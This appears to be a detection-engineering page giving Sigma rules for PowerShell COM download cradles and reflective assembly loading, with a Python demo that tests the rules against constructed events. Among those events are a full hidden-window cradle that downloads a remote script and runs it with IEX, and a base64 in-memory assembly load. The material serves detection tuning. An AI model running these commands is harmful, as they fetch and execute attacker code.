LoFP / legitimate use of the library

Techniques

Sample rules

Potential COM Objects Download Cradles Usage - Process Creation

Description

Detects PowerShell instantiating, by CLSID via [Type]::GetTypeFromCLSID, COM objects that can be abused as download cradles (process command line)

Detection logic

condition: all of selection_*
selection_1:
  CommandLine|contains: '[Type]::GetTypeFromCLSID('
selection_2:
  CommandLine|contains:
  - 0002DF01-0000-0000-C000-000000000046
  - F6D90F16-9C73-11D3-B32E-00C04F990BB4
  - F5078F35-C551-11D3-89B9-0000F81FE221
  - 88d96a0a-f192-11d4-a65f-0040963251e5
  - AFBA6B42-5692-48EA-8141-DC517DCF0EF1
  - AFB40FFD-B609-40A3-9828-F88BBE11E4E3
  - 88d96a0b-f192-11d4-a65f-0040963251e5
  - 2087c2f4-2cef-4953-a8ab-66779b670495
  - 000209FF-0000-0000-C000-000000000046
  - 00024500-0000-0000-C000-000000000046

Potential COM Objects Download Cradles Usage - PS Script

Description

Detects PowerShell instantiating, by CLSID via [Type]::GetTypeFromCLSID, COM objects that can be abused as download cradles (script block logging)

Detection logic

condition: all of selection_*
selection_1:
  ScriptBlockText|contains: '[Type]::GetTypeFromCLSID('
selection_2:
  ScriptBlockText|contains:
  - 0002DF01-0000-0000-C000-000000000046
  - F6D90F16-9C73-11D3-B32E-00C04F990BB4
  - F5078F35-C551-11D3-89B9-0000F81FE221
  - 88d96a0a-f192-11d4-a65f-0040963251e5
  - AFBA6B42-5692-48EA-8141-DC517DCF0EF1
  - AFB40FFD-B609-40A3-9828-F88BBE11E4E3
  - 88d96a0b-f192-11d4-a65f-0040963251e5
  - 2087c2f4-2cef-4953-a8ab-66779b670495
  - 000209FF-0000-0000-C000-000000000046
  - 00024500-0000-0000-C000-000000000046

Potential In-Memory Execution Using Reflection.Assembly

Description

Detects use of the [Reflection.Assembly]::Load* functions to load assemblies dynamically into the PowerShell process

Detection logic

condition: selection
selection:
  ScriptBlockText|contains: '[Reflection.Assembly]::load'
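To see how the three rules above behave against both malicious and benign activity, here is the Sigma `contains` / `all of selection_*` logic reimplemented in Python and run over a handful of constructed events. This is an added example, not code from the LoFP page or from the Sigma project; the event dictionaries (a `CommandLine` field standing in for a process-creation record, `ScriptBlockText` for a PowerShell script-block record) and every command line and script fragment in them are made up for the demonstration. It shows why the "legitimate use of the library" false positive exists: an internal monitoring script that instantiates one of the listed COM classes by CLSID, or an admin script calling `LoadWithPartialName`, trips the same selections as a download cradle or a reflective loader, while a fully qualified `[System.Reflection.Assembly]::Load` slips past the third rule because the needle begins with `[Reflection`.

```python
"""Sigma-style matching for the three rules on this page, run over constructed events.

Added example, not part of the LoFP page or the Sigma rules themselves. The event
shape (dicts carrying CommandLine / ScriptBlockText) is an assumption standing in
for Sysmon process-creation and PowerShell script-block records.
"""
from dataclasses import dataclass

# The CLSID list carried by both COM download-cradle rules (copied from the rule text).
CRADLE_CLSIDS = [
    "0002DF01-0000-0000-C000-000000000046",
    "F6D90F16-9C73-11D3-B32E-00C04F990BB4",
    "F5078F35-C551-11D3-89B9-0000F81FE221",
    "88d96a0a-f192-11d4-a65f-0040963251e5",
    "AFBA6B42-5692-48EA-8141-DC517DCF0EF1",
    "AFB40FFD-B609-40A3-9828-F88BBE11E4E3",
    "88d96a0b-f192-11d4-a65f-0040963251e5",
    "2087c2f4-2cef-4953-a8ab-66779b670495",
    "000209FF-0000-0000-C000-000000000046",
    "00024500-0000-0000-C000-000000000046",
]


@dataclass(frozen=True)
class Rule:
    title: str
    field: str          # the single event field every selection of the rule inspects
    selections: tuple   # each selection is a tuple of needles (OR); 'all of selection_*' ANDs the selections


RULES = (
    Rule("Potential COM Objects Download Cradles Usage - Process Creation", "CommandLine",
         (("[Type]::GetTypeFromCLSID(",), tuple(CRADLE_CLSIDS))),
    Rule("Potential COM Objects Download Cradles Usage - PS Script", "ScriptBlockText",
         (("[Type]::GetTypeFromCLSID(",), tuple(CRADLE_CLSIDS))),
    Rule("Potential In-Memory Execution Using Reflection.Assembly", "ScriptBlockText",
         (("[Reflection.Assembly]::load",),)),
)


def sigma_contains(value: str, needles) -> bool:
    """Sigma's |contains modifier: case-insensitive substring test, OR across list items."""
    haystack = value.casefold()
    return any(n.casefold() in haystack for n in needles)


def rule_matches(rule: Rule, event: dict) -> bool:
    value = event.get(rule.field)
    if not isinstance(value, str):
        return False    # field absent: a process event never trips a ScriptBlockText rule
    return all(sigma_contains(value, sel) for sel in rule.selections)


def evaluate(events) -> dict:
    """Map each rule title to the ids of the events it fires on."""
    return {r.title: [e["id"] for e in events if rule_matches(r, e)] for r in RULES}


# Constructed sample events (not real telemetry).
EVENTS = [
    # Cradle on the command line: HTTP COM object fetched by CLSID, response body handed to IEX.
    {"id": "proc-cradle", "CommandLine":
        "powershell -nop -w hidden -c \"$o=[Activator]::CreateInstance([Type]::GetTypeFromCLSID("
        "'2087c2f4-2cef-4953-a8ab-66779b670495'));$o.Open('GET','http://203.0.113.7/a.ps1',$false);"
        "$o.Send();IEX $o.ResponseText\""},
    # Same technique in a script block, mixed case: Sigma matching is case-insensitive (so is PowerShell).
    {"id": "script-mixed-case", "ScriptBlockText":
        "$t=[TYPE]::GetTypeFromClsid('88D96A0A-F192-11D4-A65F-0040963251E5');"
        "$x=[activator]::createinstance($t)"},
    # The false positive this page is about: an internal health check using one of the listed
    # COM classes for a benign request. The rule cannot tell it apart from the cradle.
    {"id": "script-legit-monitor", "ScriptBlockText":
        "$h=[Activator]::CreateInstance([Type]::GetTypeFromCLSID('88d96a0b-f192-11d4-a65f-0040963251e5'))\n"
        "$h.Open('GET','https://intranet.example.test/health',$false); $h.Send(); $h.Status"},
    # Same kind of object reached by ProgID instead of CLSID: outside the rule's scope, no hit.
    {"id": "script-progid", "ScriptBlockText":
        "$h=New-Object -ComObject MSXML2.XMLHTTP; $h.Open('GET','https://intranet.example.test/health',$false)"},
    # In-memory assembly load from a byte array: fires the Reflection.Assembly rule.
    {"id": "script-reflective-load", "ScriptBlockText":
        "$b=[Convert]::FromBase64String($blob); [Reflection.Assembly]::Load($b) | Out-Null"},
    # Dated but legitimate admin idiom: the same rule fires, another library-use false positive.
    {"id": "script-legit-partialname", "ScriptBlockText":
        "[Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic') | Out-Null"},
    # Fully qualified type name: '[Reflection.Assembly]::load' is not a substring, so the rule misses it.
    {"id": "script-fully-qualified", "ScriptBlockText":
        "[System.Reflection.Assembly]::Load($b) | Out-Null"},
]

if __name__ == "__main__":
    for title, hits in evaluate(EVENTS).items():
        print(f"{title}\n  -> {hits or 'no hits'}")
```

Running it fires the process-creation rule on `proc-cradle` only, the script rule on `script-mixed-case` and `script-legit-monitor`, and the Reflection.Assembly rule on `script-reflective-load` and `script-legit-partialname`; `script-progid` and `script-fully-qualified` produce no hits. Tuning these rules therefore means filtering known-good script paths or signed internal tooling rather than loosening the CLSID list, and anyone relying on the third rule should consider whether the `System.`-qualified form needs its own needle.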